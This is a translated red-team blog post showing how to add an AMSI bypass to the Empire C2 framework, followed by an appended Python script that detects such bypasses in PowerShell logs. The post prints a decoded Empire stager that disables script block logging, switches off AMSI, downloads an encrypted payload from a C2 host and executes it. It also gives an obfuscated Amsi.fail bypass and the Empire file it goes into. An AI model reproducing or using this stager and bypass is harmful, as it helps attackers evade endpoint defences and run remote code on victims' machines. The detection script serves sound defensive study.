
Building a custom Empire module to bypass AMSI

Author: 鸿鹄实验室 (Honghu Lab)
Published 2021-04-29 17:12:04

While browsing Twitter today I saw a post in which someone bypasses AMSI with a custom Empire module; the link is: https://twitter.com/_vinnybod/status/1386442836417994752

Unfortunately the author gave no details at all, so I tried it myself and wrote down the process. The latest Empire release is 3.8.2, so the test environment is the latest GitHub release, available here:

https://github.com/BC-SECURITY/Empire/releases/tag/v3.8.2

I will skip the installation: Empire ships its own install script, so it is a one-click install. We take a basic http listener as the example.

The listener shows its options, including the newly added jitter and profile settings. Execute it and generate the PowerShell payload:

powershell -noP -sta -w 1 -enc  SQBGACgAJABQAFMAVgBFAFIAcwBpAE8ATgBU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

Base64-decoding it gives the following:

('cachedGroupPolicySettings','N'+'onPublic,Static');IF($bE2E3){$8fA1B=$BE2e3.GETVALUE($nUlL);If($8fA1b['ScriptB'+'lockLogging']){$8FA1b['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$8fa1b['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$Val=[CoLlEctiONs.GeNEric.DIctIonARY[sTRINg,SyStEm.ObJect]]::neW();$VAL.ADd('EnableScriptB'+'lockLogging',0);$VAL.Add('EnableScriptBlockInvocationLogging',0);$8fa1B['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$VaL}ElSe{[ScRiptBLOck]."GeTFiE`Ld"('signatures','N'+'onPublic,Static').SetVAlUe($NUlL,(NEw-OBJeCT CollEctions.GENeRic.HasHSET[STRiNg]))}$ReF=[ReF].ASSeMBlY.GETTYpE('System.Management.Automation.Amsi'+'Utils');$ReF.GetFieLd('amsiInitF'+'ailed','NonPublic,Static').SEtVALUE($nUlL,$TrUe);};[SySTem.NET.SeRVicEPOinTMANaGER]::ExPeCt100ConTInUe=0;$E6CC5=NeW-OBJect SySTEM.NET.WeBCLIeNT;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$ser=$([TExT.ENcoDIng]::UniCOde.GETSTRInG([COnverT]::FRomBase64StRIng('aAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMgAuADEAMQA0ADoANAA0ADQANAA=')));$t='/news.php';$E6Cc5.HEadeRS.AdD('User-Agent',$u);$E6cc5.PrOxY=[SySTEM.NeT.WEbReqUeST]::DeFAuLtWEbPRoxy;$E6Cc5.PrOXy.CReDEntIALs = [SYSTeM.NeT.CREdentiaLCACHE]::DefAULtNETWoRkCREdeNtIals;$Script:Proxy = $e6cc5.Proxy;$K=[SYSTEM.TEXt.ENcoding]::ASCII.GetBYtEs('2?U4PZ^CKp([->Q*+d/BSc,TG3NwHEyk');$R={$D,$K=$ARgS;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.CounT])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-BXoR$S[($S[$I]+$S[$H])%256]}};$e6cc5.HEADers.AdD("Cookie","vFsRTxcHms=DFvQHGqcGgEXEvG4cGE4VpRZkO4=");$DATA=$E6cC5.DownLOADDAtA($sER+$T);$iV=$dAtA[0..3];$DAta=$DaTA[4..$DATA.lenGtH];-JOIn[CHar[]](& $R $daTa ($IV+$K))|IEX

We do not need to care what this code does in detail; all we need to know is that it gets blocked.

The simplest option is to use Amsi.fail to generate our payload, for example like this:

[Ref].AsSEMbly.GeTtype('System.Management.Automation.'+
$([SYsTeM.NET.weButIlity]::HTmLDEcodE('Amsi'))+
'Utils').GetField(''+$([CHAr]([BYTe]0x61)+[chAR](81+28)+
[char](211-96)+[cHaR](149-44))+'InitFailed',$([CHaR]
([byTe]0x4E)+[ChAr](198-87)+[CHaR](1980/18)+[CHAR](77+3)+
[ChAr]([Byte]0x75)+[CHar](5684/58)+[cHAR]([BYte]0x6C)+[ChAR]
([BYtE]0x69)+[ChaR]([BYTE]0x63)+[chAR]([bYtE]0x2C)+[ChAR]
([Byte]0x53)+[cHAR](116)+[ChAR](97)+[chaR]([BytE]0x74)+
[Char](68+37)+[cHAr](78+21))).Set

Executed again in this form, it is no longer blocked:

All of Empire's bypasses can be configured with the set command.

The file is located at:

/lib/common/bypasses.py

Then add the bypass just generated to that file. To deal with traffic-related issues we also change some of the listener's settings.

Then generate the payload, execute it, and get a session:
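As an added, defender-side example (not code from the original post, from Empire, or from Amsi.fail): a small Python normaliser that undoes the two obfuscation tricks visible in the payloads above, splitting strings with '+' and building characters from [char](arithmetic), and then looks for the AmsiUtils / amsiInitFailed / ScriptBlockLogging indicators in PowerShell script block log text (event 4104). The sample script-block lines are constructed for this example (the Amsi.fail-style one is a truncated variant of what the post shows); the indicator list and the [char] threshold are my own assumptions, not a published rule set.

```python
import ast
import re

# Constructed sample script-block texts in the style of PowerShell event 4104
# (not real telemetry). The first three mirror constructs from the post; the
# second is a truncated, constructed variant of the Amsi.fail-style output.
SAMPLES = {
    "reflection_bypass": "$ReF=[ReF].ASSeMBlY.GETTYpE('System.Management.Automation.Amsi'+'Utils');"
                         "$ReF.GetFieLd('amsiInitF'+'ailed','NonPublic,Static').SEtVALUE($nUlL,$TrUe)",
    "char_arith_bypass": "[Ref].AsSEMbly.GeTtype('System.Management.Automation.'+"
                         "$([SYsTeM.NET.weButIlity]::HTmLDEcodE('Amsi'))+'Utils').GetField(''+"
                         "$([CHAr]([BYTe]0x61)+[chAR](81+28)+[char](211-96)+[cHaR](149-44))+'InitFailed',"
                         "$([CHaR]([byTe]0x4E)+[ChAr](198-87)+[CHaR](1980/18)+[CHAR](77+3)))",
    "logging_tamper": "$8fa1B['HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\"
                      "ScriptB'+'lockLogging']=$VaL",
    "benign": "Get-ChildItem -Path C:\\Users -Recurse | Where-Object { $_.Length -gt 1MB }",
}

# Patterns for the obfuscation pieces seen in the payloads (single-quoted literals only).
_CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")                 # 'Amsi'+'Utils'
_SUBEXPR = re.compile(r"\$\(\s*('[^']*')\s*\)")                     # $('amsi') -> 'amsi'
_CHARCAST = re.compile(r"\[char\]\(\s*(?:\[byte\])?\s*([0-9a-fx+\-*/ ]+?)\s*\)", re.I)
_HTMLDECODE = re.compile(r"\$\(\[system\.net\.webutility\]::htmldecode\(('[^']*')\)\)", re.I)

_OPS = {ast.Add: lambda a, b: a + b, ast.Sub: lambda a, b: a - b,
        ast.Mult: lambda a, b: a * b, ast.Div: lambda a, b: a // b}


def _eval_int(expr: str) -> int:
    """Evaluate a tiny integer expression (+ - * /, hex literals) via the AST, never eval()."""
    def walk(node):
        if isinstance(node, ast.Constant) and isinstance(node.value, int):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](walk(node.left), walk(node.right))
        raise ValueError("unsupported expression")
    return walk(ast.parse(expr.strip(), mode="eval").body)


def _char_cast(m: re.Match) -> str:
    """Replace [char](expr) with the quoted character it produces, or leave it alone."""
    try:
        code = _eval_int(m.group(1))
    except (ValueError, SyntaxError, ZeroDivisionError):
        return m.group(0)
    ch = chr(code) if 0 <= code < 0x110000 else ""
    if not ch.isprintable() or ch == "'":      # a quote would break the literal model
        return m.group(0)
    return "'" + ch + "'"


def normalize(script: str) -> str:
    """Repeatedly fold the obfuscation constructs until the text stops changing."""
    prev, cur = None, script
    while cur != prev:
        prev = cur
        cur = _HTMLDECODE.sub(r"\1", cur)        # HtmlDecode('Amsi') is the identity here
        cur = _CHARCAST.sub(_char_cast, cur)
        cur = _CONCAT.sub(r"'\1\2'", cur)
        cur = _SUBEXPR.sub(r"\1", cur)
    return cur


# Indicator strings (assumed list): strong ones alone justify an alert.
STRONG = {"amsiutils", "amsiinitfailed", "cachedgrouppolicysettings"}
WEAK = {"scriptblocklogging", "nonpublic,static"}
CHAR_CAST_THRESHOLD = 4   # assumed heuristic: many [char] casts is itself suspicious


def analyze(script: str) -> dict:
    """Normalise one script block and report the indicators found in it."""
    norm = normalize(script).lower()
    hits = sorted(k for k in STRONG | WEAK if k in norm)
    char_casts = len(re.findall(r"\[char\]", script, re.I))
    concats = len(_CONCAT.findall(script))
    suspicious = any(h in STRONG for h in hits) or char_casts >= CHAR_CAST_THRESHOLD
    return {"indicators": hits, "char_casts": char_casts, "concats": concats,
            "suspicious": suspicious, "normalized": norm}


if __name__ == "__main__":
    for name, text in SAMPLES.items():
        r = analyze(text)
        print(f"{name:18} suspicious={r['suspicious']} indicators={r['indicators']} "
              f"char_casts={r['char_casts']}")
```

Run it as-is to see a verdict per sample. The normalisation step is the point: plain string matching on the raw text misses the Amsi.fail-style variant, because 'AmsiUtils' and 'amsiInitFailed' never appear literally in it, while after normalisation both payloads collapse to the same indicators. Two caveats: only single-quoted literals are modelled (double-quoted strings and the -f format operator are not), and since the stager also tries to switch off script block logging from inside the process, the block that performs the tampering may be the last one you receive, so alert on it rather than waiting for a second hit.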

Originally published 2021-04-28; shared from the 鸿鹄实验室 (Honghu Lab) WeChat public account.